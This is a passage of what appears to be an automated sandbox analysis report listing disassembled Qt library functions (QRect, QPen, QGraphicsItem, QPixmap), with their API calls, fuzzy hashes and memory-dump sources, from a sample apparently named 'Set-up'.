API ID: ?ref@AtomicBasicInt@@$Rect$Brush@@GraphicsItemPen@@PointPrivate@@Transform@@
String ID:
API String ID: 850952283-0
Opcode ID: 06fc86cb7ee806dfe9b288e839d247247f955fd3ff39f987d41d5df24db7c434
Instruction ID: 98582416e8796c724d69e07efd7fa8c83c4985b3847828c3411d336b10624591
Opcode Fuzzy Hash: 06fc86cb7ee806dfe9b288e839d247247f955fd3ff39f987d41d5df24db7c434
Instruction Fuzzy Hash: 89014875018B518FD314DF24D45979ABBE8FF49724F004D1EE4AA43380DBB96608CFA2

Function 6BC662C0 Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

?height@QRect@@QBEHXZ.QTCORE4(?,?,?,?,?), ref: 6BC662D0
?width@QRect@@QBEHXZ.QTCORE4(-00000001), ref: 6BC662E7
??0QPoint@@QAE@HH@Z.QTCORE4(-00000001), ref: 6BC662FC
??0QPoint@@QAE@HH@Z.QTCORE4(?,?,00000000), ref: 6BC66317
??0QRect@@QAE@ABVQPoint@@0@Z.QTCORE4(00000000), ref: 6BC66324

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Rect@@$Point@@$?height@?width@Point@@0@
String ID:
API String ID: 912525573-0
Opcode ID: ab4e4d23fb9f4eb71be6f828f380122276a3af49fa99f43394054c59fa44ad6d
Instruction ID: fe7f773dd61437d38d3cb2cba5dbd35ce2644680c17a999cf939e9bffa61ceea
Opcode Fuzzy Hash: ab4e4d23fb9f4eb71be6f828f380122276a3af49fa99f43394054c59fa44ad6d
Instruction Fuzzy Hash: 5FF06271300A109FC7089B6CD85497FF7F8FF45201B04451EF856C2240DB306914C792

Function 6C0BD990 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB598,?,?,?,?,?,?,00000000), ref: 6C0BD9B8

Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
Part of subcall function 6BC1DEC0: ??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
Part of subcall function 6BC1DEC0: ??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

??0QBrush@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB598,?,?,?,?,?,?,00000000), ref: 6C0BD9D1

Part of subcall function 6BD0D130: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,00000000,00000120,00000000,6C159C98,000000FF,6C0BD7E6,B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB058), ref: 6BD0D169

??0QPen@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB598,?,?,?,?,?,?,00000000), ref: 6C0BD9E1
??0QRectF@@QAE@XZ.QTCORE4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB598,?,?,?,?,?,?,00000000), ref: 6C0BD9F1
??0?$QVector@VQPoint@@@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A41AC,000000FF,6C0CB598,?,?,?,?,?,?,00000000), ref: 6C0BDA0B

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?ref@AtomicBasicInt@@$Rect$??0?$Brush@@GraphicsItemPen@@PointPoint@@@@Private@@Transform@@Vector@
String ID:
API String ID: 63717579-0
Opcode ID: f89352d139eea9a4dd1ef5c6aac60bf08ee2cac75639026e4e2f4239dbb36f6a
Instruction ID: b2cfc99ee58915b45f283d00dfdb7e28f66dec2713e5722490e680eb594a34fa
Opcode Fuzzy Hash: f89352d139eea9a4dd1ef5c6aac60bf08ee2cac75639026e4e2f4239dbb36f6a
Instruction Fuzzy Hash: DD017C75018741CFD314DF24D45579ABBE8FF49724F00490EE49A43780EB786608CFA2

Function 6C0C4350 Relevance: 7.5, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

??8@YA_NABVQRectF@@0@Z.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,6BC12F2A,00000000), ref: 6C0C4368
?prepareGeometryChange@QGraphicsItem@@IAEXXZ.QTGUI4(?,?,?,?,?,?,?,?,6BC12F2A,00000000), ref: 6C0C4377
??0QRectF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,6BC12F2A,00000000), ref: 6C0C4387
??0QRectF@@QAE@XZ.QTCORE4(?,?,?,?,?,?,?,6BC12F2A,00000000), ref: 6C0C43A0
?update@QGraphicsItem@@QAEXABVQRectF@@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,6BC12F2A,00000000), ref: 6C0C43A9

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Rect$GraphicsItem@@$??8@?prepare?update@Change@F@@0@F@@@Geometry
String ID:
API String ID: 2555729402-0
Opcode ID: d3cf63c102bb9ad40ff376702e1392f8e211d0a0738824934570047e3c7cb299
Instruction ID: 88792a963f244ca5bccb714ef5d5bcaf76618cbecbf02b0c4eb67167030a8e15
Opcode Fuzzy Hash: d3cf63c102bb9ad40ff376702e1392f8e211d0a0738824934570047e3c7cb299
Instruction Fuzzy Hash: 66F090322042045BCB149E94AC906EF77A5FFCA751F004838FD4697280CA356A1CDBA1

Function 6C0BD840 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

??0QGraphicsItemPrivate@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB258,?,?,?,?,?,?,00000000), ref: 6C0BD868

Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DEFA
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF09
Part of subcall function 6BC1DEC0: ??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF12
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF24
Part of subcall function 6BC1DEC0: ??0QPointF@@QAE@XZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF32
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF56
Part of subcall function 6BC1DEC0: ??0QTransform@@QAE@XZ.QTGUI4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DF73
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFA0
Part of subcall function 6BC1DEC0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,00000000,00000000,6C1499C2,000000FF,6C0CAD69), ref: 6BC1DFD2

??0QBrush@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB258,?,?,?,?,?,?,00000000), ref: 6C0BD881

Part of subcall function 6BD0D130: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,00000000,00000120,00000000,6C159C98,000000FF,6C0BD7E6,B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB058), ref: 6BD0D169

??0QPen@@QAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB258,?,?,?,?,?,?,00000000), ref: 6C0BD891
??0QRectF@@QAE@XZ.QTCORE4(B6508C7A,?,00000000,00000000,6C1A41AC,000000FF,6C0CB258,?,?,?,?,?,?,00000000), ref: 6C0BD8A1
??0QRectF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A41AC,000000FF,6C0CB258,?,?,?,?,?,?,00000000), ref: 6C0BD8BB

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?ref@AtomicBasicInt@@$Rect$Brush@@GraphicsItemPen@@PointPrivate@@Transform@@
String ID:
API String ID: 850952283-0
Opcode ID: b1524944c16722a22b1eb13e64ff40aec06c369661d2c6fdd41fce15b5e4fe40
Instruction ID: 843871d64d7d522d7e647a6df4f63308e9f686c42b406a1c92d4476328102705
Opcode Fuzzy Hash: b1524944c16722a22b1eb13e64ff40aec06c369661d2c6fdd41fce15b5e4fe40
Instruction Fuzzy Hash: AE0178750187418FD314DF24D455B9ABBE8FF49B24F00491EE4AA83380EBB86608CBA3

Function 6BD6E050 Relevance: 7.5, APIs: 5, Instructions: 31COMMON

Download Yara Rule

APIs

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,6BD6E0B7,00000000,?,6BC14FD8,B6508C7A,?,?,?,6C1490E8,000000FF), ref: 6BD6E064
?free@QVectorData@@SAXPAU1@H@Z.QTCORE4(?,00000004,?,?,6BD6E0B7,00000000,?,6BC14FD8,B6508C7A,?,?,?,6C1490E8,000000FF), ref: 6BD6E074
??3@YAXPAX@Z.MSVCR100(?,?,?,6BD6E0B7,00000000,?,6BC14FD8,B6508C7A,?,?,?,6C1490E8,000000FF), ref: 6BD6E07E
DeleteObject.GDI32(?), ref: 6BD6E08E
??3@YAXPAX@Z.MSVCR100(?,?,?,6BD6E0B7,00000000,?,6BC14FD8,B6508C7A,?,?,?,6C1490E8,000000FF), ref: 6BD6E095

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ??3@$?deref@?free@AtomicBasicData@@DeleteInt@@ObjectVector
String ID:
API String ID: 541070481-0
Opcode ID: b5f2878c82fd6808f584501b1dbecb9d6f0360803356749e2b989eae86d3287c
Instruction ID: 8c6223272271e72f83d434b595a81e265ec0b622eba033c55a80c956b18d2189
Opcode Fuzzy Hash: b5f2878c82fd6808f584501b1dbecb9d6f0360803356749e2b989eae86d3287c
Instruction Fuzzy Hash: ACF0A772F116109BEF104F50AC04A5FB36CEF46A61F048068E969D7600E734E515D6E2

Function 6C0C4580 Relevance: 7.5, APIs: 5, Instructions: 27COMMON

Download Yara Rule

APIs

??8QPen@@QBE_NABV0@@Z.QTGUI4(?,?,00000000), ref: 6C0C4596
?prepareGeometryChange@QGraphicsItem@@IAEXXZ.QTGUI4(?,?,00000000), ref: 6C0C45A1
??4QPen@@QAEAAV0@ABV0@@Z.QTGUI4(?,?,00000000), ref: 6C0C45AD
??0QRectF@@QAE@XZ.QTCORE4(?,?,00000000), ref: 6C0C45B6
?update@QGraphicsItem@@QAEXABVQRectF@@@Z.QTGUI4(00000000,?,00000000), ref: 6C0C45BF

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: GraphicsItem@@Pen@@RectV0@@$?prepare?update@Change@F@@@Geometry
String ID:
API String ID: 3891510234-0
Opcode ID: c194b21a7d47d474fc379a4d19362884bab94f4f35e200e299c3d957e2a26e31
Instruction ID: df67577a35894e1b77819dfb3d7f25d7036e9fcf004c48d1944605743e7ddc0e
Opcode Fuzzy Hash: c194b21a7d47d474fc379a4d19362884bab94f4f35e200e299c3d957e2a26e31
Instruction Fuzzy Hash: 07E02B733005006BC708D795C8C09EEF3ACBF9C624F000519E60953150DB357A1987B6

Function 6BCC99A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

??0QPaintDevice@@IAE@XZ.QTGUI4(B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000,6C1A41E6,000000FF), ref: 6BCC99CA

Part of subcall function 6BCC9630: ?instance@QCoreApplication@@SAPAV1@XZ.QTCORE4(?,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000), ref: 6BCC9631
Part of subcall function 6BCC9630: ?qFatal@@YAXPBDZZ.QTCORE4(QPixmap: Must construct a QApplication before a QPaintDevice,?,6BCC99E8,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000), ref: 6BCC9640

?qWarning@@YAXPBDZZ.QTCORE4(QPixmap: Cannot create a QPixmap when no GUI is being used,B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000,6C1A41E6), ref: 6BCC99F5
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,00000000,00000000,00000120,00000000,6C157543,000000FF,6C0BDA75,B6508C7A,?,?,00000000,00000000,6C1A41E6,000000FF), ref: 6BCC9A0B

Strings

QPixmap: Cannot create a QPixmap when no GUI is being used, xrefs: 6BCC99F0

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?deref@?instance@Application@@AtomicBasicCoreDevice@@Fatal@@Int@@PaintWarning@@
String ID: QPixmap: Cannot create a QPixmap when no GUI is being used
API String ID: 1159478177-2994141601
Opcode ID: 0a6701158ae042dae68ed68fb24d0967550a160f0d203763c6bdf3d8d1991c8c
Instruction ID: ee755269fa6e259a1ef934d66efc723f7cc52bf6664500e6d6c80e4a2189306b
Opcode Fuzzy Hash: 0a6701158ae042dae68ed68fb24d0967550a160f0d203763c6bdf3d8d1991c8c
Instruction Fuzzy Hash: 7411ADB1608641DFC711CF19D885A1AB7F8FB88718F40492EE56AD3741E778AA14CFA2

Function 6C0EEAC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

??0QObject@@IAE@AAVQObjectPrivate@@PAV0@@Z.QTCORE4(?,FFFFFFFF,B6508C7A,00000000,00000000,00000000,6C153CA9,000000FF,6C0EB913,00000000,?), ref: 6C0EEAF4
?connect@QObject@@SA_NPBV1@PBD01W4ConnectionType@Qt@@@Z.QTCORE4(?,2sceneRectChanged(QRectF),?,1updateSceneRect(QRectF),00000003,?,?,?,?,?,?,?,?,?,6C1A611B,000000FF), ref: 6C0EEB23

Strings

1updateSceneRect(QRectF), xrefs: 6C0EEB17
2sceneRectChanged(QRectF), xrefs: 6C0EEB1D

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Object@@$?connect@ConnectionObjectPrivate@@Qt@@@Type@V0@@
String ID: 1updateSceneRect(QRectF)$2sceneRectChanged(QRectF)
API String ID: 2059888138-392664074
Opcode ID: ecffcd2c844e1bf20857e7a5282f13300d33fd44dae1728e901d415c6a9b02ae
Instruction ID: 16fe65fc36dc27a5c2a1d64efc5be36ddc3eb4e49c7e0dd3f9f12c6e19bd4da8
Opcode Fuzzy Hash: ecffcd2c844e1bf20857e7a5282f13300d33fd44dae1728e901d415c6a9b02ae
Instruction Fuzzy Hash: 240128B6218640AFD714DF08D955F2BB7E8FB88B14F008A1EF86687780D774E910CB92

Function 6C0B9420 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

APIs

?size@QListData@@QBEHXZ.QTCORE4(00000000,?,?,?,6C0CBC1A,000000FF,00000000,00000000,00000001,00000000,?,?), ref: 6C0B95BD
?at@QListData@@QBEPAPAXH@Z.QTCORE4(00000000), ref: 6C0B95D3
?updateAncestorFlag@QGraphicsItemPrivate@@QAEXW4GraphicsItemFlag@QGraphicsItem@@W4AncestorFlag@1@_N2@Z.QTGUI4(?,?,00000002,00000000), ref: 6C0B95E7
?size@QListData@@QBEHXZ.QTCORE4(?,?,?,6C0CBC1A,000000FF,00000000,00000000,00000001,00000000,?,?), ref: 6C0B95EF

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@GraphicsList$?size@AncestorFlag@Item$?at@?updateFlag@1@_Item@@Private@@
String ID:
API String ID: 995329010-0
Opcode ID: 23660f27e2f7dbf076f75dfc3ef3317b70721527d74db801297fadea9102a361
Instruction ID: cbaf805cd23e1580ecb764c1e3c19cf68c6f780fb6959958ecffc34d3c6faf54
Opcode Fuzzy Hash: 23660f27e2f7dbf076f75dfc3ef3317b70721527d74db801297fadea9102a361
Instruction Fuzzy Hash: E651F972A486018BD300CE1585847D973F1EFA6338F288779E9A4AB782C777DC468790

Function 6BD7FC10 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

?x@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC22
?y@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC2E
?type@QTransform@@QBE?AW4TransformationType@1@XZ.QTGUI4(?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC5D
??0QPointF@@QAE@NN@Z.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C38AF), ref: 6BD7FD23

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$?type@Transform@@TransformationType@1@
String ID:
API String ID: 2177242290-0
Opcode ID: eaa154fba2f9ff2edf0a57af2b69ec8107ba1dc7e1dd5efc20f4c743f08537e5
Instruction ID: db7456717ad5dbe6fecb1a8ea4b0fae64a1551d024dc6431ae29fe0c09620349
Opcode Fuzzy Hash: eaa154fba2f9ff2edf0a57af2b69ec8107ba1dc7e1dd5efc20f4c743f08537e5
Instruction Fuzzy Hash: 9731EA72F04A54D7C3223E04D54818ABBF4FF597A0B620E88E4CB615B8FF3299749AC1

Function 6BCA1740 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

??9QBasicAtomicInt@@QBE_NH@Z.QTCORE4(00000001,B6508C7A,?,?,?,00000000,6C1A324B,000000FF,6BCA2BCC,B6508C7A,?,?,?,?,6C1541CE,000000FF), ref: 6BCA1774
??2@YAPAXI@Z.MSVCR100(00000018,?,?,?,?,6C1541CE,000000FF,6BCA3537,?,00000000,00000001,?,6BC124C1,?,B6508C7A), ref: 6BCA1780
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,?,?,?,?,000000FF), ref: 6BCA17E3

Part of subcall function 6BCA1300: ??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000001,?,6BCA179F,?,?,?,?,?,?,?,000000FF), ref: 6BCA130E
Part of subcall function 6BCA1300: ?fetchAndAddRelaxed@QBasicAtomicInt@@QAEHH@Z.QTCORE4(00000001,?,?,?,?,?,?,?,000000FF), ref: 6BCA131B

?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,?,?,?,?,000000FF), ref: 6BCA17D0

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicInt@@$??2@?deref@?fetch?ref@Latin1Relaxed@String@@
String ID:
API String ID: 654891355-0
Opcode ID: 28dd4299b03b8542229caf0259de847148e2a5318e9e6dcc0f36a7eef11206fe
Instruction ID: dfc89d3c50a06cafffc8a8c787cc29dafe189e36e607a9f8a6b6531aeaf4a841
Opcode Fuzzy Hash: 28dd4299b03b8542229caf0259de847148e2a5318e9e6dcc0f36a7eef11206fe
Instruction Fuzzy Hash: 6A2144786042128FE718CF28D494A16B7E4FF8A710F10496DE5A6C7390EB34EA00CB91

Function 6C0DADE0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6BF3BB90: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,6C181C98,000000FF,6C0DAE15,?,?), ref: 6BF3BBC6
Part of subcall function 6BF3BB90: ?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,6C181C98,000000FF), ref: 6BF3BBF0
Part of subcall function 6BF3BB90: ?end@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,6C181C98,000000FF), ref: 6BF3BBFB

?viewport@QAbstractScrollArea@@QBEPAVQWidget@@XZ.QTGUI4 ref: 6C0DAE46
?setAttribute@QWidget@@QAEXW4WidgetAttribute@Qt@@_N@Z.QTGUI4(00000002,00000001), ref: 6C0DAE51
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6C0DAE7A
?qFree@@YAXPAX@Z.QTCORE4(?), ref: 6C0DAE89

Memory Dump Source

